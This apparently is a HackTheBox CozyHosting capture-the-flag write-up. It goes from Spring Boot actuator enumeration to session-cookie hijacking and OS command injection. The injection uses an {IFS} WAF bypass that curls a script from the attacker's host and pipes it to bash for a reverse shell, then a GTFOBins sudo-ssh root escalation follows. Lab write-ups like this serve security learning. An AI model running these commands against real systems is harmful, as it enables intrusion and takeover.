HackTheBox CozyHosting walkthrough

HackTheBox - CozyHosting writeup

Published on May 14, 2024 by logoseq

Made with ❤️ by M3riart3

Walkthrough

Summary:

In this walkthrough we will learn about Spring boot framework and some common endpoints that we can find with a wordlist. Also we'll learn how to do a encoded OS command injection and get a reverse shell. Also you'll learn how to do a brute force attack to get credentials and GTFOBins for priviledged escalation.

Foothold:

Following my routine, I performed an nmap scan and observed the following open ports: 22, 80
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3
80/tcp open http nginx 1.18.0
_http-title: Did not follow redirect to http://cozyhosting.htb

I added 10.10.11.230 cozyhosting.htb to my /etc/hosts file and then searched for a subdomain but nothing was found, while feroxbuster found:

    http://cozyhosting.htb/login
    http://cozyhosting.htb/admin
    http://cozyhosting.htb/error

I successfully discovered the admin's password, which turned out to be manchesterunited. However, upon attempting to log in, I encountered a 401 Unauthorized error.

hydra found admin's password which is manchesterunited

I initiated an investigation by conducting a Google search for the error title, which led me to the realization that it is the default error page of the Spring Boot framework. Furthering my research, I performed a search for a Spring Boot specific wordlist on GitHub. The culmination of these efforts resulted from utilizing Feroxbuster's content discovery feature.

    http://cozyhosting.htb/actuator/beans
    http://cozyhosting.htb/actuator/env (filename: cloudhosting-0.0.1.jar)
    http://cozyhosting.htb/actuator/health
    http://cozyhosting.htb/actuator/mappings (Tomcat WebSocket JSR356)
    http://cozyhosting.htb/actuator/sessions (json session cookie)

Exploitation:

The /actuator/sessions endpoint in the Spring Boot application offers insights into active user sessions. During my inspection of this page, I observed a few unauthorized cookies and identified a user named kanderson. Capitalizing on this discovery, I acquired 'kanderson's' cookie and successfully gained administrative access, thus enabling access to the '/admin' page.

spring boot active session page where we can see user's cookie

For Cozy Scanner to connect the private key that you received upon registration should be included in your host's .ssh/authorised_keys file.A simple danger alert—check it out!

This suggests that an operating system command is executed when sending a POST request to the '/executessh' action. It led me to consider the possibility of an OS command injection. Indeed, I successfully executed the 'id' command via the 'username' parameter, yielding the result: uid=1001(app)

/admin page where we can input hostname and username, there is the result of a command injection into username parameter

After a series of trial and error attempts, I discovered that using individual flags such as -d didn't yield the desired results, as they seemed to isolate commands from one another. Consequently, I opted to develop a Bash script named "revS.sh" and subsequently uploaded it to the target machine.

    #!/bin/bash
    echo base64EncodedPayload | base64 -d | bash
    
    chmod +x revS.sh
    // Then I saved and named it as revS.sh
    python3 -m http.server 8888

To get the payload from my machine I used the following OS command injection: host=127.0.0.1&username=;$(curl{IFS}$MyIP:8888/revS.sh|bash)
{IFS} I used this because there was a WAF that blocked whitespaces
revS.sh it's the payload I created earlier

...

System Enumeration:

I retrieved the file /app/cloudhosting-0.0.1.jar and then employed the unzip command for extraction. This decision was based on information I stumbled upon within a random forum discussion concerning .jar files.

"There's nothing magical about a .jar file. It's just a .zip file with a different extension."

set up a python3 http server on the machine and got the source code of /app/cloudhosting-0.0.1.jar

I discovered that the server was running a PostgreSQL database on the default port 5432, and I obtained the credentials for the "postgres" user. This valuable information was located within the '/BOOT-INF/classes/application.properties' file.

postgresql credentials from /app/cloudhosting-0.0.1.jar file

  spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
  spring.datasource.username=postgres
  spring.datasource.password=Vg&nvzAQ7XxR

After some time I remembered that at the beginning I found admin's password but was useless, that's why I tried it to log in as josh and it worked!

System Exploitation:

I run:

    josh@cozyhosting:~$ sudo -l
    User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *

GTFOBins showed me how to exploit the /usr/bin/ssh command, it was pretty simple. I ran this command:


    sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x

It worked! I become root and got the flag.

Writeup learnings:

This lab provided a valuable learning experience, and I'm delighted with the knowledge I gained throughout the process. I acquired insights into the clever utilization of {IFS} (Internal Field Separator) for word splitting, enabling me to bypass a basic Web Application Firewall (WAF). Additionally, I deepened my understanding of OS command injection and its exploitation. I became proficient in using psql and unzip to retrieve the source code from a .jar file.